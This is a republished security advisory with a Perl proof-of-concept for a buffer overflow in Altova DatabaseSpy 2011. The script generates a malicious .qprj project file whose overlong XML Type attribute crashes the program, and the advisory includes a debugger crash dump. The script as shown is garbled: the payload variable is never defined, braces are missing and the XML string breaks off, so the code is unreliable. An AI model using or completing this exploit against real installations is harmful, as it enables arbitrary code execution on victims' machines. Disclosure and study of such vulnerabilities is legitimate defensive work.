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Altova DatabaseSpy 2011 Project File Handling Buffer Overflow Vulnerability
来源:http://www.altova.com 作者:LiquidWorm 发布时间:2010-10-25  

# Title: Altova DatabaseSpy 2011 Project File Handling Buffer Overflow Vulnerability
# Vendor: Altova GmbH
# Product web page: http://www.altova.com
# Affected version: Enterprise Edition 2011
# Summary: Altova DatabaseSpy® 2011 is the unique multi-database query, design,
# and database comparison tool. It connects to all major databases, easing SQL
# editing, database structure design, database content editing, database schema
# and content comparison, and database conversion for a fraction of the cost of
# single-database solutions.
# Desc: The Altova DatabaseSpy 2011 Enterprise Edition suffers from a buffer
# overflow/memory corruption vulnerability when handling project files (.qprj).
# The issue is triggered because there is no boundry checking of some XML tag
# property values, ex: <Folder FolderName="SQL" Type="AAAAAAA..../>" (~1000 bytes).
# This can aid the attacker to execute arbitrary machine code in the context of an
# affected node (locally and remotely) via file crafting or computer-based social
# engineering.
# Tested on: Microsoft Windows XP Professional SP3 (English)
#   (342c.37c0): Access violation - code c0000005 (first chance)
#   First chance exceptions are reported before any exception handling.
#   This exception may be expected and handled.
#   eax=04430041 ebx=0203ff98 ecx=0443deda edx=56413f2e esi=0022dd98 edi=00000016
#   eip=00420b83 esp=0022dc00 ebp=00000017 iopl=0         nv up ei pl nz na po nc
#   cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
#   *** ERROR: Symbol file could not be found.  Defaulted to export symbols for
#   DatabaseSpy.exe - DatabaseSpy+0x20b83:
#   00420b83 663b02          cmp     ax,word ptr [edx]        ds:0023:56413f2e=????
# Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
#                              liquidworm gmail com
#                              Zero Science Lab - http://www.zeroscience.mk
# Vendor status: [17.10.2010] Vulnerability discovered.
#                [17.10.2010] Initial contact with the vendor with sent PoC files.
#                [21.10.2010] No reply from vendor.
#                [22.10.2010] Public advisory released.
# Advisory ID: ZSL-2010-4971
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4971.php
# Advisory TXT: http://www.zeroscience.mk/codes/dbspy_bof.txt
# 17.10.2010

use strict;
system cls;

sub header()
 print "
  |      |
  | Proof Of Concept PERL script for |
  |      |
  |  Altova DatabaseSpy 2011 (Enteprise Edition)  |
  |      |
  |      |
  |      |
  |      |
  |         ---   |
  |      |
  |  Copyleft (c) 2010  |
  |      |
  |  Zero Science Lab - http://www.zeroscience.mk |
  |      |

my $FILENAME = "DEATH_FROM_ABOVE.qprj"; #DatabaseSpy Project File



my $PROJECT = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\xA<!-".
       "-  DatabaseSpy Project File  -->\xA<Project Vers".
       "ion=\"2\" Expanded=\"Yes\" Type=\"Root\" Title=".
       "\"test\">\xA\x9<Folder FolderName=\"Data Sources".
       "\" Type=\"DataSourceFolder\"/>\xA\x9<Folder Fol".
       "derName=\"SQL\" Type=\"SQLRootFolder\" database".
       "_kind=\"Unknown\" datasource=\"Offline\" descrip".
       "tion=\"Store and organize SQL files for this pro".
       "ject.\" blockingstrategy=\"semi\"/>\xA\x9<Folder".
       " FolderName=\"Design\" Type=\"$PAYLOAD\" databas".
       "e_kind=\"Unknown\" datasource=\"Offline\" descri".
       "ption=\"I LOVE VERONICA CORNINGSTONE.\"/>\xA\x9<".
       "Folder FolderName=\"Data Diff\" Type=\"DataDiffR".
       "ootFolder\"/>\xA\x9<Folder FolderName=\"Schema D".
       "iff\" Type=\"Schema DiffRootFolder\"/>\xA\x9<Fol".
       "der FolderName=\"Favorites\" Type=\"FavoriteFold".

sub code()
       system ("color 3"); #~!@#$%^&*()_+|<>?:"{}=-`';/.,0
       open qprj, ">./$FILENAME" || die "\nCan't open #$_@
       $FILENAME: $!"; print "\n (1) "; system("pause"); #
       print qprj $PROJECT; print "\n (2) Buffering mali".
       "cious format file . . .\r\n"; sleep 2; close qprj;
       print "\n (3) File $FILENAME created successfully".
       "!\n"; sleep 2; system ("color \x44"); sleep 1; #.%
       print "\n (4) And the color is changed.\n";

print "\n";


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